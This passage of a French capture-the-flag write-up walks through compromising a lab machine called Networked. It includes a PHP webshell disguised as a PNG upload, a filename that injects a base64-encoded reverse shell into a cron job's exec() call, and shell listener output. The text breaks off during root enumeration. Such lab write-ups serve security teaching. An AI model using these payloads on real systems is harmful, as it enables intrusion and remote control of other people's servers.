class="p">|</span> <span class="m">256</span> 2d6328fca299c7d435b9459a4b38f9c8 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAsf1XXvL55L6U7NrCo3XSBTr+zCnnQ+GorAMgUugr3ihPkA+4Tw2LmpBr1syz7Z6PkNyQw6NzC3KwSUy1BOGw8<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 73cda05b84107da71c7c611df554cfc4 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILMrhnJBfdb0fWQsWVfynAxcQ8+SNlL38vl8VJaaqPTL </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.6 <span class="o">((</span>CentOS<span class="o">)</span> PHP/5.4.16<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.6 <span class="o">(</span>CentOS<span class="o">)</span> PHP/5.4.16 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Site doesn<span class="err">&#39;</span>t have a title <span class="o">(</span>text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>UTF-8<span class="o">)</span>. </span></span><span class="line"><span class="cl">443/tcp closed https reset ttl <span class="m">63</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="website--port-80">Website : Port 80 </h3><p>En arrivant sur le site, on trouve le message suivant.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Hello mate, we<span class="err">&#39;</span>re building the new FaceMash! </span></span><span class="line"><span class="cl">Help by funding us and be the new Tyler<span class="p">&amp;</span>Cameron! </span></span><span class="line"><span class="cl">Join us at the pool party this Sat to get a glimpse </span></span></code></pre></td></tr></table> </div> </div><h3 id="dirsearch--backuptar-uploadphp">dirsearch : /backup.tar, /upload.php </h3><p>A la racine du site internet, on trouve une archive <strong>backup.tar</strong> contenant les sources du site internet. De plus, on découvre une page nous permettant d&rsquo;uploader des images et une page pour les observer &ldquo;photos.php&rdquo;. Un dossier /uploads semble contenir les photos téléchargées.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">dirsearch -u http://10.10.10.146 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> _<span class="p">|</span>. _ _ _ _ _ _<span class="p">|</span>_ v0.4.3 </span></span><span class="line"><span class="cl"> <span class="o">(</span>_<span class="o">||</span><span class="p">|</span> _<span class="o">)</span> <span class="o">(</span>/_<span class="o">(</span>_<span class="o">||</span> <span class="o">(</span>_<span class="p">|</span> <span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extensions: php, asp, aspx, jsp, html, htm <span class="p">|</span> HTTP method: GET <span class="p">|</span> Threads: <span class="m">25</span> <span class="p">|</span> Wordlist size: <span class="m">12289</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Target: http://10.10.10.146/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>13:59:45<span class="o">]</span> Scanning: </span></span><span class="line"><span class="cl"><span class="o">[</span>13:59:53<span class="o">]</span> <span class="m">301</span> - 235B - /backup -&gt; http://10.10.10.146/backup/ </span></span><span class="line"><span class="cl"><span class="o">[</span>13:59:53<span class="o">]</span> <span class="m">200</span> - 885B - /backup/ </span></span><span class="line"><span class="cl"><span class="o">[</span>13:59:53<span class="o">]</span> <span class="m">403</span> - 210B - /cgi-bin/ </span></span><span class="line"><span class="cl"><span class="o">[</span>13:59:55<span class="o">]</span> <span class="m">200</span> - 229B - /index.php </span></span><span class="line"><span class="cl"><span class="o">[</span>13:59:55<span class="o">]</span> <span class="m">200</span> - 229B - /index.php/login/ </span></span><span class="line"><span class="cl"><span class="o">[</span>13:59:57<span class="o">]</span> <span class="m">200</span> - 1KB - /photos.php </span></span><span class="line"><span class="cl"><span class="o">[</span>14:00:00<span class="o">]</span> <span class="m">200</span> - 169B - /upload.php </span></span><span class="line"><span class="cl"><span class="o">[</span>14:00:00<span class="o">]</span> <span class="m">301</span> - 236B - /uploads -&gt; http://10.10.10.146/uploads/ </span></span><span class="line"><span class="cl"><span class="o">[</span>14:00:00<span class="o">]</span> <span class="m">200</span> - 2B - /uploads/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Task Completed </span></span></code></pre></td></tr></table> </div> </div><h3 id="file-upload--rce">File Upload : RCE </h3><p>Après avoir analysé le code source récupéré dans le <strong>backup.tar</strong>, on se rend compte qu&rsquo;il existe un endoit <strong>/photos.php</strong> permettant d&rsquo;observer les images uploader sur la page <strong>/upload.php</strong>.</p> <p>Après quelque tests et analyse du code php, on réussi à uploader un fichier php et a executer du code. Pour cela, j&rsquo;ai dans un premier temps uploader une veritable image png, puis j&rsquo;ai changer l&rsquo;extension en &ldquo;.php.png&rdquo;. Ensuite, il a fallu supprimer le texte de l&rsquo;image et le remplacer par du code PHP. Le plus important était de conserver le magic byte &ldquo;PNG&rdquo;, c&rsquo;est à dire les premiers octets de l&rsquo;image permettant de reconnaitre qu&rsquo;il s&rsquo;agit bien d&rsquo;une image PNG.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /upload.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: 10.10.10.146 </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:136.0<span class="o">)</span> Gecko/20100101 Firefox/136.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Content-Type: multipart/form-data<span class="p">;</span> <span class="nv">boundary</span><span class="o">=</span>---------------------------19843469784126652896583145162 </span></span><span class="line"><span class="cl">Content-Length: <span class="m">383</span> </span></span><span class="line"><span class="cl">Origin: http://10.10.10.146 </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://10.10.10.146/upload.php </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-----------------------------19843469784126652896583145162 </span></span><span class="line"><span class="cl">Content-Disposition: form-data<span class="p">;</span> <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;myFile&#34;</span><span class="p">;</span> <span class="nv">filename</span><span class="o">=</span><span class="s2">&#34;htb-logo.php.png&#34;</span> </span></span><span class="line"><span class="cl">Content-Type: image/png </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">‰PNG </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&lt;?php system<span class="o">(</span><span class="nv">$_REQUEST</span><span class="o">[</span><span class="s1">&#39;cmd&#39;</span><span class="o">])</span><span class="p">;</span> ?&gt; </span></span><span class="line"><span class="cl">-----------------------------19843469784126652896583145162 </span></span><span class="line"><span class="cl">Content-Disposition: form-data<span class="p">;</span> <span class="nv">name</span><span class="o">=</span><span class="s2">&#34;submit&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">go! </span></span><span class="line"><span class="cl">-----------------------------19843469784126652896583145162-- </span></span></code></pre></td></tr></table> </div> </div><p>Pour obtenir un reverse shell de qualité, j&rsquo;ai upload ensuite le code &ldquo;Reverse shell Pentest Monnkey&rdquo; afin d&rsquo;obtenir un shell stable :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1337 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1337 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.146. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.146:56866. </span></span><span class="line"><span class="cl">Linux networked.htb 3.10.0-957.21.3.el7.x86_64 <span class="c1">#1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux</span> </span></span><span class="line"><span class="cl"> 14:59:42 up 1:04, <span class="m">0</span> users, load average: 0.00, 0.01, 0.05 </span></span><span class="line"><span class="cl">USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>48<span class="o">(</span>apache<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>48<span class="o">(</span>apache<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>48<span class="o">(</span>apache<span class="o">)</span> </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">bash-4.2$ whoami </span></span><span class="line"><span class="cl">apache </span></span></code></pre></td></tr></table> </div> </div><h2 id="apache---guly">apache -&gt; guly </h2><h3 id="improper-sanitization--command-injection">Improper sanitization : Command Injection </h3><p>A la racine de du /home de l&rsquo;utilisateur <strong>guly</strong>, on trouve un fichier check_attack.php ainsi qu&rsquo;une crontab montrant que l&rsquo;utilisateur guly execute ce fichier php toute les 3mns.</p> <p>On comprend qu&rsquo;il parcourt le fichier /uploads du site web, si le nom du fichier ne contient pas une IP valide, il execute une commande pour supprimer le fichier.</p> <p>Cependant, on remarque qu&rsquo;il utilise la fonction exec() avec /bin/rm, au lieu d&rsquo;utiliser une fonction php classique permettant la suppression d&rsquo;un fichier. Cela nous permet de créer un fichier avec des &ldquo;;&rdquo; permettant l&rsquo;execution de n&rsquo;importe quelle commande Bash !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">bash-4.2$ cat check_attack.php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl">require <span class="s1">&#39;/var/www/html/lib.php&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$path</span> <span class="o">=</span> <span class="s1">&#39;/var/www/html/uploads/&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$logpath</span> <span class="o">=</span> <span class="s1">&#39;/tmp/attack.log&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$to</span> <span class="o">=</span> <span class="s1">&#39;guly&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$msg</span><span class="o">=</span> <span class="s1">&#39;&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$headers</span> <span class="o">=</span> <span class="s2">&#34;X-Mailer: check_attack.php\r\n&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$files</span> <span class="o">=</span> array<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="nv">$files</span> <span class="o">=</span> preg_grep<span class="o">(</span><span class="s1">&#39;/^([^.])/&#39;</span>, scandir<span class="o">(</span><span class="nv">$path</span><span class="o">))</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">foreach <span class="o">(</span><span class="nv">$files</span> as <span class="nv">$key</span> <span class="o">=</span>&gt; <span class="nv">$value</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nv">$msg</span><span class="o">=</span><span class="s1">&#39;&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="o">(</span><span class="nv">$value</span> <span class="o">==</span> <span class="s1">&#39;index.html&#39;</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="k">continue</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="c1">#echo &#34;-------------\n&#34;;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="c1">#print &#34;check: $value\n&#34;;</span> </span></span><span class="line"><span class="cl"> list <span class="o">(</span><span class="nv">$name</span>,<span class="nv">$ext</span><span class="o">)</span> <span class="o">=</span> getnameCheck<span class="o">(</span><span class="nv">$value</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nv">$check</span> <span class="o">=</span> check_ip<span class="o">(</span><span class="nv">$name</span>,<span class="nv">$value</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="o">(</span>!<span class="o">(</span><span class="nv">$check</span><span class="o">[</span>0<span class="o">]))</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> <span class="s2">&#34;attack!\n&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="c1"># todo: attach file</span> </span></span><span class="line"><span class="cl"> file_put_contents<span class="o">(</span><span class="nv">$logpath</span>, <span class="nv">$msg</span>, FILE_APPEND <span class="p">|</span> LOCK_EX<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> exec<span class="o">(</span><span class="s2">&#34;rm -f </span><span class="nv">$logpath</span><span class="s2">&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> exec<span class="o">(</span><span class="s2">&#34;nohup /bin/rm -f </span><span class="nv">$path$value</span><span class="s2"> &gt; /dev/null 2&gt;&amp;1 &amp;&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> <span class="s2">&#34;rm -f </span><span class="nv">$path$value</span><span class="s2">\n&#34;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> mail<span class="o">(</span><span class="nv">$to</span>, <span class="nv">$msg</span>, <span class="nv">$msg</span>, <span class="nv">$headers</span>, <span class="s2">&#34;-F</span><span class="nv">$value</span><span class="s2">&#34;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">?&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">bash-4.2$ cat crontab.guly </span></span><span class="line"><span class="cl">*/3 * * * * php /home/guly/check_attack.php </span></span></code></pre></td></tr></table> </div> </div><p>Voici un exemple de nom de fichier nous permettant d&rsquo;executer un reverse shell facilement :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">cd</span> /var/www/html/uploads </span></span><span class="line"><span class="cl">touch <span class="s1">&#39;a; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yLzkwMDEgMD4mMQ== | base64 -d | bash; ls&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Voici la commande</span> </span></span><span class="line"><span class="cl"><span class="c1"># nohup /bin/rm -f $path$value &gt; /dev/null 2&gt;&amp;1 &amp;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Voici ce que le programme va reellement executer</span> </span></span><span class="line"><span class="cl">nohup /bin/rm -f /var/www/html/uploads/a<span class="p">;</span> <span class="nb">echo</span> YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yLzkwMDEgMD4mMQ<span class="o">==</span> <span class="p">|</span> base64 -d <span class="p">|</span> bash<span class="p">;</span> ls &gt; /dev/null 2&gt;<span class="p">&amp;</span><span class="m">1</span> <span class="p">&amp;</span> </span></span></code></pre></td></tr></table> </div> </div><p>On obtient bien un shell en tant que <strong>guly</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::9001 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:9001 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.146. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.146:47670. </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl"><span class="o">[</span>guly@networked ~<span class="o">]</span>$ whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">guly </span></span><span class="line"><span class="cl"><span class="o">[</span>guly@networked ~<span class="o">]</span>$ python2 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">python2 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>guly@networked ~<span class="o">]</span>$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="o">[</span>guly@networked ~<span class="o">]</span>$ ^Z </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">4656</span> suspended nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl"> $ stty raw -echo<span class="p">;</span><span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">4656</span> continued nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>guly@networked ~<span class="o">]</span>$ </span></span><span class="line"><span class="cl"><span class="o">[</span>guly@networked ~<span class="o">]</span>$ ls </span></span><span class="line"><span class="cl">check_attack.php crontab.guly k user.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>guly@networked ~<span class="o">]</span>$ cat user.txt </span></span><span class="line"><span class="cl">37e0.....3b8 </span></span></code></pre></td></tr></table> </div> </div><h2 id="guly---root">guly -&gt; root </h2><h3 id="enumeration-1">Enumeration </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>guly@networked ~<span class="o">]</span>$ cat /etc/sysconfig/network-scripts/ifcfg-guly </span></span><span class="line"><span class="cl"><span class="nv">DEVICE</span><span class="o">=</span>guly0 </span></span><span class="line"><span class="cl"><span class="nv">ONBOOT</span><span class="o">=</span>no </span></span><span class="line"><span class="cl"><span class="nv">NM_CONTROLLED</span><span class="o">=</span>no </span></span><span class="line"><span class="cl"><span class="nv">NAME</span><span class="o">=</span>ps /tmp/foo </span></span><span class="line"><span class="cl"><span class="nv">PROXY_METHOD</span><span class="o">=</span>asodih </span></span><span class="line"><span class="cl"><span class="nv">BROWSER_ONLY</span><span class="o">=</span>asdoih </span></span><span class="line"><span class="cl"><span class="nv">BOOTPROTO</span><span class="o">=</span>asdoih </span></span><span class="line"><span class="cl"><span class="o">[</span>guly@networked ~<span class="o">]</span>$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> guly on networked: </span></span><span class="line"><span class="cl"> !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, </span></span><span class="line"><span class="cl"> env_reset, <span class="nv">env_keep</span><span class="o">=</span><span class="s2">&#34;COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="nv">env_keep</span><span class="o">+=</span><span class="s2">&#34;MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="nv">env_keep</span><span class="o">+=</span><span class="s2">&#34;LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="nv">env_keep</span><span class="o">+=</span><span class="s2">&#34;LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="nv">env_keep</span><span class="o">+=</span><span class="s2">&#34;LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="nv">secure_path</span><span class="o">=</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User guly may run the following commands on networked: </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/local/sbin/changename.sh </span></span></code></pre></td></tr></table> </div> </div><h3 id="usrlocalsbinchangenamesh">/usr/local/sbin/changename.sh </h3><p>Le script nous demande de renseigner plusieurs valeur: NAME, PROXY_METHOD&hellip;</p> <p>Ces valeurs sont mises dans un fichier : <code>/etc/sysconfig/network-scripts/ifcfg-guly</code><br> Ensuite, la commande suivante est executé : <code>/sbin/ifup guly0</code></p> <p>Ce fichier permet donc de configurer une interface, puis de l&rsquo;activer &ldquo;/sbin/ifup INTERFACE&rdquo;.</p> <p>Après quelques recherches sur internet, et d&rsquo;après l&rsquo;indication fournis, il semble qu&rsquo;une injection de commande soit possible dans le fichier de l&rsquo;interface. En fait, chaque ligne est executé comme du code Bash.</p> <p>Donc lorsqu&rsquo;on ecrit :</p> <ul> <li>NAME=VALUE COMMAND ARGS</li> </ul> <p><strong>NAME</strong> prend bien la valeur <strong>VALUE</strong>, mais ce qui suit est executé comme une commande, on peut même passer des arguments si necessaire.</p> <p>Lorsque qu&rsquo;on allume l&rsquo;interface, le code Bash malicieux est tout de suite executé.</p> <p>On remarque pourtant un filtre mais il n&rsquo;est pas suffisant.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>guly@networked ~<span class="o">]</span>$ cat /usr/local/sbin/changename.sh </span></span><span class="line"><span class="cl"><span class="c1">#!/bin/bash -p</span> </span></span><span class="line"><span class="cl">cat &gt; /etc/sysconfig/network-scripts/ifcfg-guly <span class="s">&lt;&lt; EoF </span></span></span><span class="line"><span class="cl"><span class="s">DEVICE=guly0 </span></span></span><span class="line"><span class="cl"><span class="s">ONBOOT=no </span></span></span><span class="line"><span class="cl"><span class="s">NM_CONTROLLED=no </span></span></span><span class="line"><span class="cl"><span class="s">EoF</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">regexp</span><span class="o">=</span><span class="s2">&#34;^[a-zA-Z0-9_\ /-]+</span>$<span class="s2">&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">for</span> var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO<span class="p">;</span> <span class="k">do</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> <span class="s2">&#34;interface </span><span 